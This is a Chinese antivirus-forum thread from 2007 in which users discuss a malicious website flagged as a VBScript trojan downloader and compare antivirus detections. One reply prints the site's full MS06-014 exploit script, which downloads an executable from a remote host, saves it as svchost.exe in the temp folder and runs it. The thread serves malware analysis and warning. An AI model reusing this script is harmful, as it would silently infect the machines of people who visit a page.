搜索
查看: 2303|回复: 11
收起左侧

毒网一个

[复制链接]
yzt1004
发表于 2007-3-27 21:41:01 | 显示全部楼层 |阅读模式
探测到: 木马程序 Trojan-Downloader.VBS.Small.dk        网址: http://www.xiaoshuowang.com.cn/y.html
不知道有没有什么新鲜玩意儿,,,
yzt1004
 楼主| 发表于 2007-3-27 21:59:11 | 显示全部楼层
楼上小心,,,
我是用火狐进的,补丁都打过了,,,
小邪邪
发表于 2007-3-27 22:01:47 | 显示全部楼层
有恶意脚本

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
The EQs
发表于 2007-3-27 22:02:47 | 显示全部楼层
谁给个样本???
gbwyy
头像被屏蔽
发表于 2007-3-27 22:28:51 | 显示全部楼层
小红伞和费尔都报了
dikex
发表于 2007-3-27 22:53:43 | 显示全部楼层
on error resume next
    m1="object"
    m2="classid"
    m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    m4="Microsoft.XMLHTTP"
    m5="Shell.Application"
    m6="Scripti"&"ng.Fil"&"eSystemObject"
    Set xasonc = document.createElement(m1)
    xason = "http://www.xiaoshuowang.com.cn/asia.exe"
    xasonc.setAttribute m2, m3
    xasoni=m4
    Set xasond = xasonc.CreateObject(xasoni,"")
    yhangf="Ado"
    yhangg="db."
    yhangh="Str"
    yhangi="eam"
    xasonf=yhangf&yhangg&yhangh&yhangi
    xasong=xasonf
    set xasona = xasonc.createobject(xasong,"")
    xasona.type = 1
    xasonh="G"&"E"&"T"
    xasond.Open xasonh, xason, False
    xasond.Send
    xason9="svchost.exe"
    set xasonb = xasonc.createobject(m6,"")
    set xasone = xasonb.GetSpecialFolder(2)
    xasona.open
    xason8="xasona.BuildPath(xasona,xason8)"
    xason7="xasonb.BuildPath(xasonb,xason7)"
    xason6="xasonc.BuildPath(xasond,xason6)"
    xason5="xasond.BuildPath(xasonf,xason5)"
    xason4="xasone.BuildPath(xasong,xason4)"
    xason3="xasonf.BuildPath(xasonh,xason4)"
    xason2="xasong.BuildPath(xasoni,xason3)"
    xason1="xasonh.BuildPath(xasong,xason1)"
    xason0="xasoni.BuildPath(xasonk,xason0)"
    xason9= xasonb.BuildPath(xasone,xason9)
    xasona.write xasond.responseBody
    xasona.savetofile xason9,2
    xasona.close
    set xasone = xasonc.createobject(m5,"")
    xasone.ShellExecute xason9,BBS,BBS,"o"&"p"&"e"&"n",


MS06-014网马,下载http://www.xiaoshuowang.com.cn/asia.exe

[ 本帖最后由 dikex 于 2007-3-27 22:59 编辑 ]
The EQs
发表于 2007-3-27 22:57:37 | 显示全部楼层
多谢刺猬。。。。。
tonger2003
发表于 2007-3-27 23:09:20 | 显示全部楼层
现在卡巴完善了哦

我D盘感染的程序 没有删除掉  修复了感染的程序~~`
solcroft
发表于 2007-3-28 02:47:03 | 显示全部楼层

Cyberhawk

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|卡饭乐购| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2019-9-18 17:43 , Processed in 0.053620 second(s), 5 queries , MemCache On.

快速回复 返回顶部 返回列表